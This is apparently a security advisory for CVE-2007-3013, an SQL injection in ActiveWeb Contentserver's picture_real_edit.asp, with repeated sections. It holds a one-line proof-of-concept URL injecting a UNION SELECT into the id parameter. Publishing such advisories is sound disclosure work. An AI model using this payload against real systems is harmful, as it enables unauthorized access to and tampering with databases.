ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability
BID:24894
Info
ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability
| Bugtraq ID: | 24894 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3013 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 13 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | RedTeam Pentesting is credited with the discovery of this vulnerability. |
| Vulnerable: |
Active Web Softwares contentserver 5.6.2929 |
| Not Vulnerable: | |
Discussion
ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability
activeWeb contentserver is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Reports indicate that contentserver versions prior to 5.6.2964 are vulnerable to this issue.
activeWeb contentserver is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Reports indicate that contentserver versions prior to 5.6.2964 are vulnerable to this issue.
Exploit / POC
ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability
This issue may be triggered using a browser.
The following proof-of-concept has been provided:
https://www.example.com/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version--
This issue may be triggered using a browser.
The following proof-of-concept has been provided:
https://www.example.com/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version--
Solution / Fix
ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability
Solution:
Reports indicate that version 5.6.2964 is not affected by this issue, however Symantec was unable to verify this information. Please contact the vendor for more information.
Solution:
Reports indicate that version 5.6.2964 is not affected by this issue, however Symantec was unable to verify this information. Please contact the vendor for more information.
References
ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability
References:
References:
- ActiveWeb Contentserver CMS SQL Injection Management Interface (RedTeam Pentesting GmbH)
- contentserver (activeWeb)